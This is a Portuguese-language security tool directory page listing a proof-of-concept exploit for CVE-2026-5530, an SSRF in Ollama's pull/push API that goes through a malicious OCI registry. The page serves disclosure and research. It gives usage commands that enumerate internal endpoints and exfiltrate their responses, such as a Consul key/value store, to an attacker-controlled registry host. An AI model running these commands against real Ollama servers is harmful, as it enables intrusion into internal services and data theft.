Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5530 — Prova de conceito de exploit para CVE-2026-5530, uma SSRF na API Pull/Push do Ollama, permitindo enumeração de endpoints internos e exfiltração completa de respostas por meio de um registro OCI malicioso. | Kitploit
Ferramentas/GitHubGitHub/davidrxchester/cve-2026-5530
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de Informações
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Prova de conceito de exploit para CVE-2026-5530, uma SSRF na API Pull/Push do Ollama, permitindo enumeração de endpoints internos e exfiltração completa de respostas por meio de um registro OCI malicioso.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-5530

SSRF no Ollama via redirecionamento de registro OCI com exfiltração completa da resposta.

Writeup: https://davidrochester.com/posts/cve-2026-5530

Divulgação

O Ollama foi contatado várias vezes sem resposta.

Uso

Três modos: enum, exfil e probe.

Enum

Encontra endpoints internos ativos acessíveis a partir do host do Ollama.

root@kitploit:~
python3 poc.py targets.txt --registry-host <seu-ip>

Exfil

Exfiltra respostas SSRF quando você sabe o tamanho da resposta.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <seu-ip>

Probe

Faz busca binária pelo tamanho da resposta automaticamente e depois exfiltra.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <seu-ip>

Opções

root@kitploit:~
target              URL ou arquivo de URLs (uma por linha, # para comentários)
-p, --port          porta do registro malicioso (padrão: 9999)
--exfil-port        porta do registro de exfiltração (padrão: 10000)
--exfil             modo exfil, requer --size
--probe             busca binária pelo tamanho e depois exfiltra
--size              Content-Length (obrigatório com --exfil)
--registry-host     seu IP/hostname de atacante que o Ollama consegue acessar
--ollama            URL da API do Ollama (padrão: http://127.0.0.1:11434)
Baixar ferramenta